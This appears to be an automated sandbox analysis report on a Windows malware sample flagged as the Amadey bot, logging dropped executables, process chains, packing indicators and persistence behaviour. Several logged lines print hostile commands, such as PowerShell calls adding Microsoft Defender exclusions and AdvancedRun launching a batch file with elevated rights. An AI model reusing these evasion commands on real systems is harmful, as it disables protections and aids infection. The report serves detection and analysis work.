Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\69B.exe C:\Users\user\AppData\Local\Temp\69B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1254.exe C:\Users\user\AppData\Local\Temp\1254.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\20BD.exe C:\Users\user\AppData\Local\Temp\20BD.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe C:\Users\user\AppData\Local\Temp\31F4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3C84.exe C:\Users\user\AppData\Local\Temp\3C84.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\46D6.exe C:\Users\user\AppData\Local\Temp\46D6.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5483.exe C:\Users\user\AppData\Local\Temp\5483.exe
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9415.exe C:\Users\user\AppData\Local\Temp\9415.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 'C:\Users\user\AppData\Local\Temp\31F4.exe'
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\ssbavbe C:\Users\user\AppData\Roaming\ssbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\16BC.exe C:\Users\user\AppData\Local\Temp\16BC.exe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\69B.exe C:\Users\user\AppData\Local\Temp\69B.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1254.exe C:\Users\user\AppData\Local\Temp\1254.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\20BD.exe C:\Users\user\AppData\Local\Temp\20BD.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe C:\Users\user\AppData\Local\Temp\31F4.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 28_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9A4B.tmp Jump to behavior
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: C:\Users\user\AppData\Local\Temp\69B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9415.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 25_2_004095FD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
Source: 31F4.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\69B.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5483.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\5483.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\69B.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vojos\fuw.pdb source: 20BD.exe, 00000014.00000002.863191806.0000000000417000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 31F4.exe, 00000016.00000002.938495921.0000000003625000.00000004.00000001.sdmp, 31F4.exe, 0000001A.00000000.887030697.0000000000400000.00000040.00000001.sdmp, 31F4.exe, 00000024.00000000.938689458.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.851564916.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp
Source: Binary string: c C:\rudiletama-43\bano.pdbp source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 20BD.exe, 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 20BD.exe
Source: Binary string: C:\rudiletama-43\bano.pdb source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: NC:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Unpacked PE file: 20.2.20BD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Unpacked PE file: 24.2.46D6.exe.400000.0.unpack .text:ER;.data:W;.daya:W;.rsrc:R;.reloc:R; vs .text:EW;
.NET source code contains potential unpacker
Source: 9415.exe.6.dr, SqlGeneratorForm.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E54 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E63 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402665 push cs; ret 20_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_0040290C push eax; iretd 20_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E16 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DC0 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DD8 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DE8 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DF1 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E82 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E85 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402D92 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E95 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00401D9A pushad ; ret 20_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E9C push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABBD0D1 push ecx; ret 20_2_6ABBD0E4
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_00B1CF50 push ss; ret 23_2_00B1CF51
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C328C4 push esp; iretd 24_2_02C328C5
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C31AB1 push ds; retf 24_2_02C31AB9
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C31614 push edx; iretd 24_2_02C31622
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C32728 push ds; retf 24_2_02C3272C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040B50D push ecx; ret 25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_0040B550 push eax; ret 28_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_0040B550 push eax; ret 28_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_0040B50D push ecx; ret 28_2_0040B51D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426900 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426900
Binary contains a suspicious time stamp
Source: 1254.exe.6.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: 5483.exe.6.dr Static PE information: section name: .ziwer
Source: 9A4B.exe.6.dr Static PE information: section name: .lopaba
Source: 20BD.exe.6.dr Static PE information: section name: .cipizi
Source: 16BC.exe.6.dr Static PE information: section name: .nuwomux
Source: 46D6.exe.6.dr Static PE information: section name: .daya
Source: 3D90.exe.6.dr Static PE information: section name: .vinelog
Source: ssbavbe.6.dr Static PE information: section name: .cipizi
PE file contains an invalid checksum
Source: 2CF4.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: 69B.exe.6.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: 3C84.exe.6.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 9415.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x1e70bf
Source: 31F4.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xdd7bb
Source: initial sample Static PE information: section name: .text entropy: 6.97839927821
Source: initial sample Static PE information: section name: .text entropy: 7.87137605191
Source: initial sample Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample Static PE information: section name: .text entropy: 7.67238292604
Source: initial sample Static PE information: section name: .text entropy: 7.0016627071
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.83595599089
Source: initial sample Static PE information: section name: .text entropy: 7.83351783168
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample Static PE information: section name: .text entropy: 7.79655519179
Source: initial sample Static PE information: section name: .text entropy: 6.97839927821
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306

Persistence and Installation Behavior:

barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\iwbavbe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ssbavbe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\abbavbe Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\69B.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\46D6.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3C84.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\69B.exe File created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9A4B.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9415.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3D90.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\iwbavbe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\39A7.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\abbavbe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ssbavbe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5483.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5483.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2CF4.exe Jump to dropped file
